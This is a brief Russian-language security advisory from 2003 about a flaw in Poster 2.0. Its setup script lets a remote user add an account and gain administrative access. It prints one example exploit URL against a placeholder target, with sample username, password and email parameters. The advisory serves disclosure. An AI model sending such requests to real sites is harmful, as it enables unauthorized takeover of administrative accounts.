Security Lab

Неавторизованный доступ к административным функциям в Poster 2.0

Дата публикации:19.08.2003
Всего просмотров:1038
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Уязвимость обнаружена в Poster. Удаленный пользователь может получить доступ к административным функциям.

Удаленный пользователь может получить доступ к установочному сценарию, чтобы добавить учетную запись пользователя. Пример:

http://[target]/poster/?go=setup_submit&un=DarkKnight&pw=123456&em=EMAIL&submit=submit

Уязвимость обнаружена в Poster 2.0

Ссылки: Poster.Version:Two Setup Vulnerability